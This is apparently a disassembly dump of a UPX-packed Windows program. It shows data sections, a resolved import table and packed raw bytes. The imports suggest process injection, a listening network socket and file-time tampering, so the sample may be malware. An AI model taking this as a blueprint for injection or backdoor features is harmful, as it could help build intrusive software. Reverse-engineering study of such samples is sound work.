dword_413F90 dd 0 ; sub_4053A3+140�w
dword_413F94 dd 0 dword_413F98 dd 0 ; sub_4053A3:loc_40564C�w
dword_413F9C dd 0 dword_413FA0 dd 0 ; sub_4053A3:loc_40578B�w ...
dword_413FA4 dd 0 dword_413FA8 dd 0 dword_413FAC dd 0 dword_413FB0 dd 0 dword_413FB4 dd 0 dword_413FB8 dd 0 dword_413FBC dd 0 ; sub_405186+C6�r ...
dword_413FC0 dd 0 dword_413FC4 dd 0 dword_413FC8 dd 0 dword_413FCC dd 0 dword_413FD0 dd 0 dword_413FD4 dd 0 dword_413FD8 dd 0 dword_413FDC dd 0 dd 0
dword_413FE4 dd 0 dword_413FE8 dd 0 dword_413FEC dd 0 dword_413FF0 dd 0 dword_413FF4 dd 0 dword_413FF8 dd 0 dword_413FFC dd 0 dd 2 dup(0)
dword_414008 dd 0 ; sub_4053A3+F1E�w
dword_41400C dd 0 dd 2 dup(0)
dword_414018 dd 0 dword_41401C dd 0 dd 27h dup(0)
dword_4140BC dd 0 ; sub_407E71+5E�w ...
dd 4CCCh dup(0)
dword_4273F0 dd 0 ; sub_40829C+95�r ...
dword_4273F4 dd 0 ; sub_4081D8+50�w
dword_4273F8 dd 0 ; sub_4081D8+8�w ...
dword_4273FC dd 0 ; sub_4081D8+1C�w ...
dword_427400 dd 0 dword_427404 dd 0 dword_427408 dd 0 dword_42740C dd 0 ; sub_4081D8+5B�w
dword_427410 dd 0 ; sub_4081D8+61�w
align 10h
dword_427420 dd 0 ; sub_408976+56�r ...
dd 80h dup(0)
dword_427624 dd 0 ; sub_408A19+40�w ...
dword_427628 dd 0 ; sub_408A19+46�w ...
dword_42762C dd 0 ; sub_408A19+3A�r ...
dword_427630 dd 0 ; sub_401B8B+45A�w ...
dword_427634 dd 0 ; sub_408A19+67�r ...
dword_427638 dd 0 ; UPX0:0040B8F5�w ...
dword_42763C dd 0 dd 10F78h dup(0)
dword_46B420 dd 81h dup(0) ; sub_408AB4+24�o ...
dword_46B624 dd 0 ; sub_408DF8+19�o
dword_46B628 dd 1288h dup(0) db 3 dup(0)
byte_47004B db 0 ; DATA XREF: UPX0:00412159�o
dd 235Ch dup(0)
dword_478DBC dd 0Dh dup(0) dword_478DF0 dd 136h dup(0) dword_4792C8 dd 0 ; sub_40AD1A+4A�w ...
dword_4792CC dd 0 ; sub_40AD1A+194�w ...
align 1000h
UPX0 ends
; Section 2. (virtual address 0007A000)
; Virtual size : 00009000 ( 36864.)
; Section size in file : 00009000 ( 36864.)
; Offset to raw data for section: 0007A000
; Flags E0000040: Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX1 segment para public 'CODE' use32
assume cs:UPX1
;org 47A000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dword_47A000 dd 0B2h dup(0) ; UPX1:off_48118D�o
dword_47A2C8 dd 6 dup(0) ; sub_40AD1A+1A9�o ...
dword_47A2E0 dd 0 ; sub_40A9CB+AF�o ...
dword_47A2E4 dd 0 dword_47A2E8 dd 0 ; sub_40A9CB+80�r
dword_47A2EC dd 31h dup(0) dword_47A3B0 dd 0 ; sub_40A9CB:loc_40AAA2�r
dword_47A3B4 dd 0 dword_47A3B8 dd 0DEh dup(0) ; sub_40A87B+F1�o ...
byte_47A730 db 0 ; DATA XREF: sub_40B30A+82�r
; sub_40B30A+BC�w
align 4
dword_47A734 dd 0 dword_47A738 dd 0 dword_47A73C dd 0 dword_47A740 dd 0 dword_47A744 dd 0 align 10h
dword_47A750 dd 0FFFFFFFFh ; UPX0:0040C55E�w
align 10h
dword_47A760 dd 0FFFFFFFFh ; sub_40C2C0+1A�o ...
dd 329h dup(0)
dword_47B408 dd 77DFD4C9h ; resolved to->ADVAPI32.GetUserNameA ; UPX0:0040C21C�r
dd 0Bh dup(0)
dword_47B438 dd 7C810A77h ; resolved to->KERNEL32.GetFileSize ; sub_40BC82+374�r ...
dword_47B43C dd 7C8361EEh ; resolved to->KERNEL32.GetDateFormatA ; UPX0:0040C830�r
dword_47B440 dd 7C801EEEh ; resolved to->KERNEL32.GetStartupInfoA ; UPX0:0040C83C�r
dword_47B444 dd 7C83632Dh ; resolved to->KERNEL32.GetTimeFormatA ; UPX0:0040C82A�r
dword_47B448 dd 7C80180Eh ; resolved to->KERNEL32.ReadFile ; UPX0:0040C81E�r
dword_47B44C dd 7C82C2D3h ; resolved to->KERNEL32.GetLogicalDriveStringsA ; UPX0:0040C818�r
dword_47B450 dd 7C8214E3h ; resolved to->KERNEL32.GetDriveTypeA ; UPX0:0040C812�r
dword_47B454 dd 7C834D41h ; resolved to->KERNEL32.lstrcatA ; UPX0:0040C80C�r
dword_47B458 dd 7C810B8Eh ; resolved to->KERNEL32.SetFilePointer ; UPX0:0040C824�r
dword_47B45C dd 7C8217ACh ; resolved to->KERNEL32.CreateDirectoryA ; UPX0:0040C806�r
dword_47B460 dd 7C901005h ; resolved to->NTDLL.RtlEnterCriticalSection ; UPX0:0040C7FA�r
dword_47B464 dd 7C9010EDh ; resolved to->NTDLL.RtlLeaveCriticalSection ; UPX0:0040C7F4�r
dword_47B468 dd 7C91188Ah ; resolved to->NTDLL.RtlDeleteCriticalSection ; sub_40AD1A+1AE�r ...
dword_47B46C dd 7C80B829h ; resolved to->KERNEL32.InitializeCriticalSectionAndSpinCount ; UPX0:0040C7E8�r
dword_47B470 dd 7C835BB0h ; resolved to->KERNEL32.GetShortPathNameA ; UPX0:0040C7E2�r
dword_47B474 dd 7C814AF2h ; resolved to->KERNEL32.GetEnvironmentVariableA ; UPX0:0040C7DC�r
dword_47B478 dd 7C82C338h ; resolved to->KERNEL32.SetPriorityClass ; UPX0:0040C7D6�r
dword_47B47C dd 7C80C108h ; resolved to->KERNEL32.SetThreadPriority ; UPX0:004095E7�r ...
dword_47B480 dd 7C8610E0h ; resolved to->KERNEL32.SetProcessPriorityBoost ; UPX0:0040C7CA�r
dword_47B484 dd 7C8286EEh ; resolved to->KERNEL32.CopyFileA ; sub_40B47F+175�r ...
dword_47B488 dd 7C80BDB6h ; resolved to->KERNEL32.lstrlenA ; sub_40B47F+259�r ...
dword_47B48C dd 7C80998Dh ; resolved to->KERNEL32.LocalAlloc ; UPX0:0040C78E�r
dword_47B490 dd 7C821363h ; resolved to->KERNEL32.GetWindowsDirectoryA ; UPX0:0040C7BE�r
dword_47B494 dd 7C831C45h ; resolved to->KERNEL32.GetFileTime ; UPX0:0040C7B8�r
dword_47B498 dd 7C831CB8h ; resolved to->KERNEL32.SetFileTime ; UPX0:0040C7B2�r
dword_47B49C dd 7C81153Ch ; resolved to->KERNEL32.GetFileAttributesA ; sub_408F96+87�r ...
dword_47B4A0 dd 7C81CE03h ; resolved to->KERNEL32.TerminateThread ; UPX0:0040C7A6�r
dword_47B4A4 dd 7C801E16h ; resolved to->KERNEL32.TerminateProcess ; UPX0:0040C7A0�r
dword_47B4A8 dd 7C80D262h ; resolved to->KERNEL32.GetLocaleInfoA ; sub_404F82+FD�r ...
dword_47B4AC dd 7C80E93Fh ; resolved to->KERNEL32.CreateMutexA ; UPX0:0040C776�r
dword_47B4B0 dd 7C801D77h ; resolved to->KERNEL32.LoadLibraryA ; sub_4053A3+2B8�r ...
dword_47B4B4 dd 7C831EABh ; resolved to->KERNEL32.DeleteFileA ; UPX0:0040C76A�r
dword_47B4B8 dd 7C8024A7h ; resolved to->KERNEL32.ReleaseMutex ; sub_40965C+2D�r ...
dword_47B4BC dd 7C812782h ; resolved to->KERNEL32.SetFileAttributesA ; sub_408F96+9E�r ...
dword_47B4C0 dd 7C801A24h ; resolved to->KERNEL32.CreateFileA ; sub_408EA4+4B�r ...
dword_47B4C4 dd 7C80C058h ; resolved to->KERNEL32.ExitThread ; UPX0:00403628�r ...
dword_47B4C8 dd 7C8329D9h ; resolved to->KERNEL32.ExpandEnvironmentStringsA ; UPX0:0040C75E�r
dword_47B4CC dd 7C802367h ; resolved to->KERNEL32.CreateProcessA ; UPX0:00403587�r ...
dword_47B4D0 dd 7C802520h ; resolved to->KERNEL32.WaitForSingleObject ; sub_4081D8+8A�r ...
dword_47B4D4 dd 7C810D87h ; resolved to->KERNEL32.WriteFile ; sub_40B47F+10B�r ...
dword_47B4D8 dd 7C835DCAh ; resolved to->KERNEL32.GetTempPathA ; UPX0:0040C734�r
dword_47B4DC dd 7C810637h ; resolved to->KERNEL32.CreateThread ; sub_401B8B+84F�r ...
dword_47B4E0 dd 7C80BAA1h ; resolved to->KERNEL32.lstrcmpiA ; sub_406B46+25A�r ...
dword_47B4E4 dd 7C910331h ; resolved to->NTDLL.RtlGetLastWin32Error ; sub_401B8B+8CA�r ...
dword_47B4E8 dd 7C80929Ch ; resolved to->KERNEL32.GetTickCount ; UPX0:loc_4031E0�r ...
dword_47B4EC dd 7C802442h ; resolved to->KERNEL32.Sleep ; sub_401B8B+86F�r ...
dword_47B4F0 dd 7C8309E1h ; resolved to->KERNEL32.OpenProcess ; sub_40890C+22�r ...
dword_47B4F4 dd 7C809A72h ; resolved to->KERNEL32.VirtualAllocEx ; UPX0:0040C70A�r
dword_47B4F8 dd 7C80ADA0h ; resolved to->KERNEL32.GetProcAddress ; sub_4053A3+11�r ...
dword_47B4FC dd 7C81042Ch ; resolved to->KERNEL32.CreateRemoteThread ; UPX0:0040C6FE�r
dword_47B500 dd 7C80992Fh ; resolved to->KERNEL32.LocalFree ; UPX0:0040C788�r
dword_47B504 dd 7C80DDF5h ; resolved to->KERNEL32.GetCurrentProcess ; UPX0:00409548�r ...
dword_47B508 dd 7C80220Fh ; resolved to->KERNEL32.WriteProcessMemory ; UPX0:0040C704�r
dword_47B50C dd 7C8098EBh ; resolved to->KERNEL32.GetCurrentThread ; UPX0:0040958F�r ...
dword_47B510 dd 7C80B4CFh ; resolved to->KERNEL32.GetModuleFileNameA ; sub_40186B+D3�r ...
dword_47B514 dd 7C81CDDAh ; resolved to->KERNEL32.ExitProcess ; sub_401B8B+C68�r ...
dword_47B518 dd 7C80B6A1h ; resolved to->KERNEL32.GetModuleHandleA ; sub_40186B+11�r ...
dword_47B51C dd 7C812ADEh ; resolved to->KERNEL32.GetVersionExA ; sub_404D74+32�r ...
dword_47B520 dd 7C809B47h ; resolved to->KERNEL32.CloseHandle ; UPX0:0040329E�r ...
dd 16h dup(0)
dword_47B57C dd 77C34E51h ; resolved to->MSVCRT.__dllonexitdword_47B580 dd 77C3F010h ; resolved to->MSVCRT.fopen ; UPX0:0040C524�r
dword_47B584 dd 77C39E9Ah ; resolved to->MSVCRT._exit ; UPX0:0040C68E�r
dword_47B588 dd 77C32DAEh ; resolved to->MSVCRT._XcptFilterdword_47B58C dd 77C4139Ch ; resolved to->MSVCRT.fseek ; UPX0:0040BB14�r ...
dword_47B590 dd 77C34DF8h ; resolved to->MSVCRT._onexitdword_47B594 dd 77C4AEA3h ; resolved to->MSVCRT.time ; UPX0:0040C50C�r
dword_47B598 dd 77C411FBh ; resolved to->MSVCRT.fread ; UPX0:0040BB27�r ...
dword_47B59C dd 77C39D67h ; resolved to->MSVCRT._inittermdword_47B5A0 dd 77C4D675h ; resolved to->MSVCRT.__setusermatherr ; UPX0:0040C6BE�r
dword_47B5A4 dd 77C623D8h ; resolved to->MSVCRT._adjust_fdivdword_47B5A8 dd 77C1F1A4h ; resolved to->MSVCRT.__p__commode ; UPX0:0040C6C8�r
dword_47B5AC dd 77C1F1DBh ; resolved to->MSVCRT.__p__fmode ; UPX0:0040C6CE�r
dword_47B5B0 dd 77C3537Ch ; resolved to->MSVCRT.__set_app_type ; UPX0:0040C6D4�r
dword_47B5B4 dd 77C4EE2Fh ; resolved to->MSVCRT._controlfpdword_47B5B8 dd 77C41B72h ; resolved to->MSVCRT.sscanf ; UPX0:0040C512�r
dword_47B5BC dd 77C4624Eh ; resolved to->MSVCRT._stricmp ; UPX0:0040C410�r
dword_47B5C0 dd 77C46EB0h ; resolved to->MSVCRT.memcmpdword_47B5C4 dd 77C47920h ; resolved to->MSVCRT.strncat ; UPX0:00409522�r ...
dword_47B5C8 dd 77C46320h ; resolved to->MSVCRT._strlwr ; UPX0:0040C304�r
dword_47B5CC dd 77C47850h ; resolved to->MSVCRT.strcspn ; UPX0:0040C3C0�r
dword_47B5D0 dd 77C47CE5h ; resolved to->MSVCRT.strtok ; sub_406F72+E3�r ...
dword_47B5D4 dd 77C46F70h ; resolved to->MSVCRT.memcpydword_47B5D8 dd 77C3FF8Ah ; resolved to->MSVCRT._vsnprintf ; sub_40419B+2F�r ...
dword_47B5DC dd 77C2C407h ; resolved to->MSVCRT.malloc ; sub_4074A8+B�r ...
dword_47B5E0 dd 77C475F0h ; resolved to->MSVCRT.memsetdword_47B5E4 dd 77C2C21Bh ; resolved to->MSVCRT.free ; UPX0:004091C9�r ...
dword_47B5E8 dd 77C46040h ; resolved to->MSVCRT.strcatdword_47B5EC dd 77C371D3h ; resolved to->MSVCRT.rand ; sub_401B8B+5F1�r ...
dword_47B5F0 dd 77C478A0h ; resolved to->MSVCRT.strlendword_47B5F4 dd 77C29CC5h dword_47B5F8 dd 77C371BCh ; resolved to->MSVCRT.srand ; UPX0:004039C8�r ...
dword_47B5FC dd 77C3F931h ; resolved to->MSVCRT.sprintf ; UPX0:004034A7�r ...
dword_47B600 dd 77C1BF18h ; resolved to->MSVCRT.atoi ; sub_401B8B+510�r ...
dword_47B604 dd 77C46030h ; resolved to->MSVCRT.strcpydword_47B608 dd 77C47660h ; resolved to->MSVCRT.strchr ; sub_4045CE+1D�r ...
dword_47B60C dd 77C47BE0h ; resolved to->MSVCRT.strrchr ; UPX0:0040C264�r
dword_47B610 dd 77C47C60h ; resolved to->MSVCRT.strstr ; sub_40457E+2�r ...
dword_47B614 dd 77C47A90h ; resolved to->MSVCRT.strncpy ; sub_401B8B+6D9�r ...
dword_47B618 dd 77C47730h ; resolved to->MSVCRT.strcmpdword_47B61C dd 77C39E7Eh ; resolved to->MSVCRT.exit ; UPX0:0040C69A�r
dword_47B620 dd 77C3FA76h ; resolved to->MSVCRT._snprintf ; sub_40176D+4B�r ...
dword_47B624 dd 77C617ACh ; resolved to->MSVCRT._acmdlndword_47B628 dd 77C35C94h ; resolved to->MSVCRT._except_handler3dword_47B62C dd 77C4FA10h ; resolved to->MSVCRT._ftoldword_47B630 dd 77C1EEEBh ; resolved to->MSVCRT.__getmainargs ; UPX0:0040C6A0�r
dword_47B634 dd 77C46125h ; resolved to->MSVCRT._strdup ; UPX0:0040C842�r
dd 14h dup(0)
dword_47B688 dd 7CA40BB5h ; UPX0:0040C234�r
dword_47B68C dd 7CA24A55h ; UPX0:0040C22E�r
dd 0Bh dup(0)
dword_47B6BC dd 7E42DE87h ; resolved to->USER32.FindWindowA ; UPX0:0040C228�r
dword_47B6C0 dd 7E418A80h ; resolved to->USER32.GetWindowThreadProcessId ; UPX0:0040C222�r
dd 0Bh dup(0)
dword_47B6F0 dd 71AB4519h ; resolved to->WS2_32.ioctlsocket ; UPX0:0040C216�r
dword_47B6F4 dd 71AB4544h ; resolved to->WS2_32.__WSAFDIsSetdword_47B6F8 dd 71AC1028h ; resolved to->WS2_32.accept ; UPX0:0040C20A�r
dword_47B6FC dd 71AD2E70h ; resolved to->WSOCK32.recv ; UPX0:0040C204�r
dword_47B700 dd 71AB428Ah ; resolved to->WS2_32.send ; UPX0:0040C1FE�r
dword_47B704 dd 71AB94DCh ; resolved to->WS2_32.WSAGetLastError ; UPX0:0040C1F8�r
dword_47B708 dd 71AB3B91h ; resolved to->WS2_32.socket ; sub_40BC82+50�r ...
dword_47B70C dd 71AB4FD4h ; resolved to->WS2_32.gethostbyname ; sub_4086B2+28�r ...
dword_47B710 dd 71AB2DC0h ; resolved to->WS2_32.select ; sub_40BC82+188�r ...
dword_47B714 dd 71AD3005h ; resolved to->WSOCK32.recvfrom ; UPX0:0040C1E0�r
dword_47B718 dd 71AB664Dh ; resolved to->WS2_32.WSAStartup ; sub_40BC82+32�r ...
dword_47B71C dd 71AC0BDEh ; resolved to->WS2_32.shutdown ; UPX0:0040C1D4�r
dword_47B720 dd 71AB9639h ; resolved to->WS2_32.closesocket ; sub_40BC82+292�r ...
dword_47B724 dd 71AB2B66h ; resolved to->WS2_32.ntohs ; sub_40BC82+8E�r ...
dword_47B728 dd 71AD2E30h ; resolved to->WSOCK32.setsockopt ; sub_40BC82+69�r ...
dword_47B72C dd 71AB3E00h ; resolved to->WS2_32.bind ; sub_40BC82+9F�r ...
dword_47B730 dd 71AB88D3h ; resolved to->WS2_32.listen ; sub_40BC82+AC�r ...
dword_47B734 dd 71AC0B50h ; resolved to->WS2_32.getpeername ; sub_40BC82+2D7�r ...
dword_47B738 dd 71ABE479h ; resolved to->WS2_32.gethostbyaddr ; sub_4086B2+5B�r ...
dword_47B73C dd 71AB3F41h ; resolved to->WS2_32.inet_ntoa ; sub_4086B2+39�r ...
dword_47B740 dd 71AB2BF4h ; resolved to->WS2_32.inet_addr ; sub_4086B2+45�r ...
dword_47B744 dd 71AB2C69h ; resolved to->WS2_32.sendto ; UPX0:0040C1EC�r
dd 0E2Eh dup(0)
dd 0C4h, 7A438h, 74654701h, 656C6946h, 657A6953h, 65470100h
dd 74614474h, 726F4665h, 4174616Dh, 65470100h, 61745374h
dd 70757472h, 6F666E49h, 47010041h, 69547465h, 6F46656Dh
dd 74616D72h, 52010041h, 46646165h, 656C69h, 74654701h
dd 69676F4Ch, 446C6163h, 65766972h, 69727453h, 4173676Eh
dd 65470100h, 69724474h, 79546576h, 416570h, 74736C01h
dd 74616372h, 53010041h, 69467465h, 6F50656Ch, 65746E69h
dd 43010072h, 74616572h, 72694465h, 6F746365h, 417972h
dd 746E4501h, 72437265h, 63697469h, 65536C61h, 6F697463h
dd 4C01006Eh, 65766165h, 74697243h, 6C616369h, 74636553h
dd 6E6F69h, 6C654401h, 43657465h, 69746972h, 536C6163h
dd 69746365h, 1006E6Fh, 74696E49h, 696C6169h, 7243657Ah
dd 63697469h, 65536C61h, 6F697463h, 646E416Eh, 6E697053h
dd 6E756F43h, 47010074h, 68537465h, 5074726Fh, 4E687461h
dd 41656D61h, 65470100h, 766E4574h, 6E6F7269h, 746E656Dh
dd 69726156h, 656C6261h, 53010041h, 72507465h, 69726F69h
dd 6C437974h, 737361h, 74655301h, 65726854h, 72506461h
dd 69726F69h, 1007974h, 50746553h, 65636F72h, 72507373h
dd 69726F69h, 6F427974h, 74736Fh, 706F4301h, 6C694679h
dd 1004165h, 7274736Ch, 416E656Ch, 6F4C0100h, 416C6163h
dd 636F6C6Ch, 65470100h, 6E695774h, 73776F64h, 65726944h
dd 726F7463h, 1004179h, 46746547h, 54656C69h, 656D69h
dd 74655301h, 656C6946h, 656D6954h, 65470100h, 6C694674h
dd 74744165h, 75626972h, 41736574h, 65540100h, 6E696D72h
dd 54657461h, 61657268h, 54010064h, 696D7265h, 6574616Eh
dd 636F7250h, 737365h, 74654701h, 61636F4Ch, 6E49656Ch
dd 416F66h, 65724301h, 4D657461h, 78657475h, 4C010041h
dd 4C64616Fh, 61726269h, 417972h, 6C654401h, 46657465h
dd 41656C69h, 65520100h, 7361656Ch, 74754D65h, 1007865h
dd 46746553h, 41656C69h, 69727474h, 65747562h, 1004173h
dd 61657243h, 69466574h, 41656Ch, 69784501h, 72685474h
dd 646165h, 70784501h, 45646E61h, 7269766Eh, 656D6E6Fh
dd 7453746Eh, 676E6972h, 1004173h, 61657243h, 72506574h
dd 7365636Fh, 1004173h, 74696157h, 53726F46h, 6C676E69h
dd 6A624F65h, 746365h, 69725701h, 69466574h, 100656Ch
dd 54746547h, 50706D65h, 41687461h, 72430100h, 65746165h
dd 65726854h, 1006461h, 7274736Ch, 69706D63h, 47010041h
dd 614C7465h, 72457473h, 726F72h, 74654701h, 6B636954h
dd 6E756F43h, 53010074h, 7065656Ch, 704F0100h, 72506E65h
dd 7365636Fh, 56010073h, 75747269h, 6C416C61h, 45636F6Ch
dd 47010078h, 72507465h, 6441636Fh, 73657264h, 43010073h
dd 74616572h, 6D655265h, 5465746Fh, 61657268h, 4C010064h
dd 6C61636Fh, 65657246h, 65470100h, 72754374h, 746E6572h
dd 636F7250h, 737365h, 69725701h, 72506574h, 7365636Fh
dd 6D654D73h, 79726Fh, 74654701h, 72727543h, 54746E65h
dd 61657268h, 47010064h, 6F4D7465h, 656C7564h, 656C6946h
dd 656D614Eh, 45010041h, 50746978h, 65636F72h, 1007373h
dd 4D746547h, 6C75646Fh, 6E614865h, 41656C64h, 65470100h
dd 72655674h, 6E6F6973h, 417845h, 6F6C4301h, 61486573h
dd 656C646Eh, 0D10000h, 0A4080000h, 47010007h, 73557465h
dd 614E7265h, 41656Dh, 0DE00h, 7A57C00h, 5F5F0100h, 6F6C6C64h
dd 6978656Eh, 66010074h, 6E65706Fh, 655F0100h, 746978h
dd 63585F01h, 69467470h, 7265746Ch, 73660100h, 6B6565h
dd 6E6F5F01h, 74697865h, 69740100h, 100656Dh, 61657266h
dd 5F010064h, 74696E69h, 6D726574h, 5F5F0100h, 75746573h
dd 6D726573h, 65687461h, 1007272h, 6A64615Fh, 5F747375h
dd 76696466h, 5F5F0100h, 635F5F70h, 6F6D6D6Fh, 1006564h
dd 5F705F5Fh, 6F6D665Fh, 1006564h, 65735F5Fh, 70615F74h
dd 79745F70h, 1006570h, 6E6F635Fh, 6C6F7274h, 1007066h
dd 61637373h, 100666Eh, 7274735Fh, 69706D63h, 656D0100h
dd 706D636Dh, 74730100h, 61636E72h, 5F010074h, 6C727473h
dd 1007277h, 63727473h, 6E7073h, 72747301h, 6B6F74h, 6D656D01h
dd 797063h, 73765F01h, 6972706Eh, 66746Eh, 6C616D01h, 636F6Ch
dd 6D656D01h, 746573h, 65726601h, 73010065h, 61637274h
dd 72010074h, 646E61h, 72747301h, 6E656Ch, 323F3F01h, 50415940h
dd 40495841h, 7301005Ah, 646E6172h, 70730100h, 746E6972h
dd 61010066h, 696F74h, 72747301h, 797063h, 72747301h, 726863h
dd 72747301h, 72686372h, 74730100h, 72747372h, 74730100h
dd 70636E72h, 73010079h, 6D637274h, 65010070h, 746978h
dd 6E735F01h, 6E697270h, 1006674h, 6D63615Fh, 6E6C64h
dd 78655F01h, 74706563h, 6E61685Fh, 72656C64h, 5F010033h
dd 6C6F7466h, 5F5F0100h, 6D746567h, 616E6961h, 736772h
dd 74735F01h, 70756472h, 0E90000h, 0A6880000h, 53010007h
dd 6C6C6568h, 63657845h, 45657475h, 1004178h, 68434853h
dd 65676E61h, 69746F4Eh, 7966h, 0F5h, 7A6BCh, 6E694601h
dd 6E695764h, 41776F64h, 65470100h, 6E695774h, 54776F64h
dd 61657268h, 6F725064h, 73736563h, 6449h, 100h, 7A6F0h
dd 0FF000CFFh, 1FF0097h, 10FF00h, 0FF0013FFh, 17FF006Fh
dd 34FF00h, 0FF0012FFh, 73FF0011h, 16FF00h, 0FF0003FFh
dd 15FF0009h, 2FF00h, 0FF000DFFh, 33FF0005h, 0BFF00h, 0FF000AFFh
dd 14h, 50000000h, 4C000045h, 33000501h, 492DB9h, 0
dd 0E0000000h, 0B010F00h, 601h, 0C8h, 6E8h, 2A000000h
dd 0C5h, 10h, 0E0h, 4000h, 10h, 4000002h, 0
dd 4000000h, 2 dup(0)
dd 7F0h, 0C0000004h, 2000151h, 0
dd 1000h, 10h, 1000h, 10h, 10000000h, 3 dup(0)
dd 8C0007B0h, 7 dup(0)
dd 380007D0h, 11h, 0Bh dup(0)
dd 8000000h, 7C0007B4h, 3, 5 dup(0)
dd 2E000000h, 74786574h, 0F3000000h, 0C7h, 10h, 0C8h, 4
dd 2 dup(0)
dd 20000000h, 2E600000h, 74616472h, 4000061h, 2, 0E0h
dd 4, 0CCh, 2 dup(0)
dd 40000000h, 2E400000h, 61746164h, 64000000h, 6B7h, 0F0h
dd 48h, 0D0h, 2 dup(0)
dd 40000000h, 2EC00000h, 74616469h, 1C000061h, 10h, 7B0h
dd 12h, 118h, 2 dup(0)
dd 40000000h, 2EC00000h, 6F6C6572h, 0E000063h, 18h, 7D0h
dd 1Ah, 12Ah, 2 dup(0)
dd 40000000h, 420000h, 840007E0h, 6B0007B7h, 100007E6h
dd 51F11864h, 38600810h, 57C21A69h, 20B61611h, 0C52D49F7h
dd 0C1700106h, 75427256h, 8C760572h, 0AF79C3EEh, 910F6373h
dd 60461023h, 0DCDAF15h, 4741AF63h, 192995F6h, 0C78A0DB7h
dd 54BA2431h, 21938DB0h, 0BDC09A57h, 1D36F605h, 0AB4D431Fh
dd 0F047F05Eh, 734C7D43h, 1744E61h, 0B6416F54h, 6BCF21A2h
dd 50841D37h, 0C4172C20h, 21204F61h, 39D51FB6h, 0C1C5A7B4h
dd 5217756Fh, 6F739D07h, 816D5B07h, 0BF2E318Dh, 0D18848D8h
dd 2E8D6B6Fh, 0CC32787h, 1F14C383h, 32736382h, 0D06BC5Bh
dd 0A70047h, 483027BBh, 0C1FEE07Ch, 0C18DF60Bh, 6B63636Ah
dd 70625026h, 0A74FE7C0h, 0D22A2839h, 102DC9B6h, 36CB2D75h
dd 9F07C322h, 69462779h, 0C6541D0Fh, 0EEE04625h, 36943C4Bh
dd 7C79654Bh, 6B611D26h, 1F9F56DBh, 0C62BC83Ch, 5F1EC32Ch
dd 0AD6D8720h, 816DADA5h, 6CF831Fh, 2596DD33h, 236C268Dh
dd 0D8E5A590h, 27DBCDB7h, 6D234309h, 890F2374h, 67835431h
dd 89A3669Eh, 263DDA21h, 0D8875691h, 9C56236Eh, 0C32B1FF7h
dd 7F9C6D86h, 4355211Dh, 490C0762h, 60303F8Eh, 8FA216C3h
dd 0BA23FB21h, 7913C5B0h, 0DA9F151Fh, 974781Bh, 416F62F5h
dd 558A3687h, 710235Ah, 322B604Dh, 79BE600Dh, 9D9B095h
dd 12367781h, 4C216E1Bh, 0F12E0FD8h, 20638320h, 75A9E7D8h
dd 41082B96h, 0C7FF5AEAh, 2B00AC18h, 3C75E037h, 7281886Dh
dd 7050A7D7h, 4E4C0464h, 0AEF010D4h, 0F4B01D1h, 7F8A433Fh
dd 39578DD6h, 41325B65h, 9FBBA1BFh, 79544631h, 0A11EB870h
dd 8ED16CABh, 132DD963h, 0B074F572h, 577323F6h, 53EE6B51h
dd 0F1D23520h, 0C11963E9h, 0C21602F0h, 63A60BA3h, 8142FD89h
dd 78654E21h, 8F1411Fh, 374700A4h, 0F8162D6Ch, 3570B99Eh
dd 0F7C76E53h, 840B54B0h, 0B6F54E3Bh, 0E6D377DAh, 39083031h
dd 7383631h, 0E3239h, 599A3F7Ah, 0D62E2637h, 66516362h
dd 0BFFB7EDDh, 6B6A693Fh, 6F6E6D6Ch, 75D27170h, 79787776h
dd 0A4019F7Ah, 5922FFD4h, 52455601h, 4E4F4953h, 0EE02F016h
dd 0A007D9Ah, 255F0237h, 16F16Ch, 28639B24h, 1372DF7Eh
dd 333406D6h, 33D73233h, 3030E937h, 0E6F7A135h, 36360FFBh
dd 31323317h, 0B14F5400h, 0BF7B0643h, 0BB8ECFDBh, 9E524F52h
dd 0F0540363h, 5D070B7Fh, 35343332h, 39383736h, 0CDD2AB5Bh
dd 4B48076Fh, 5F594555h, 0B8275388h, 431DDBDFh, 55432FD4h
dd 544E45D3h, 0C725D20Fh, 4946973Eh, 4C523F47h, 0BE0E93B7h
dd 5F5345B3h, 7FF04F1Dh, 2ED39255h, 4C3FBE25h, 0F0F02B4Dh
dd 434F4C7Fh, 4D5F4C41h, 71484341h, 7076E745h, 675D40DFh
dd 0C50F5F47h, 0EF931E44h, 554DC9BFh, 49544C0Fh, 465A535Fh
dd 0DDDA5845h, 500F7F6Dh, 29444E41h, 7F0E2608h, 7B3DDB6Eh
dd 4A49425Fh, 0BB4D4945h, 906F4C37h, 8FDBE197h, 255551CEh
dd 2E0B794Eh, 4E574FEDh, 5E231947h, 70316A42h, 5952417Bh
dd 2954287Fh, 8E122520h, 0A9BDD45Ah, 0D5E8F684h, 6166792Eh
dd 47297443h, 7204B89Dh, 0A420FCCFh, 84E02774h, 0A5AE3C52h
dd 818916Fh, 62811750h, 0C0A37093h, 26816775h, 0AF4D081Eh
dd 66205C81h, 0FA9464BCh, 29AF55B2h, 0C42E70ABh, 12765DA6h
dd 47FA1B22h, 56CEA545h, 606663DAh, 0EB117326h, 4F534FC1h
dd 0AB575446h, 86995C45h, 5CD76D58h, 7554E67Bh, 886E8056h
dd 32D74517h, 0F0876915h, 367F4797h, 878042FFh, 203E2020h
dd 632F756Eh, 10AA6FF0h, 4FFF20D2h, 4550534Dh, 88EE0643h
dd 0ED70471Bh, 78CD89Fh, 6B9DB7E1h, 9A69BD6Eh, 0E86E00F7h
dd 0C4D8071Dh, 9A69A6B4h, 0A0A4ACA6h, 0A69A8894h, 74809A69h
dd 6064686Ch, 69A69A69h, 4850585Ch, 9A69A640h, 1C2834A6h
dd 0D34D040Ch, 1CFCCB34h, 0DCE4ECF4h, 0D34D34D4h, 0BCC4CC34h
dd 34D3A8B4h, 949CD34Dh, 4D7C848Ch, 744D34D3h, 585C606Ch
dd 0D34D344Ch, 28304034h, 0F34D141Ch, 410D35Eh, 0E8071BDEh
dd 9A69D8E0h, 0C8D034D6h, 0B4B8BC26h, 0A69A69A6h, 0A4A8ACB0h
dd 69A69AA0h, 8890989Ah, 6D707880h, 6C69A690h, 0A6586068h
dd 0D34D3454h, 40484C34h, 0A69A3038h, 2028D20Dh, 4101806h
dd 6CB34D34h, 0E4F01AF8h, 34D3D4DCh, 0C8CCD34Dh, 4DB4BCC4h
dd 0AC4D34D3h, 747C889Ch, 0D34D346Ch, 444C5C34h, 34D32C30h
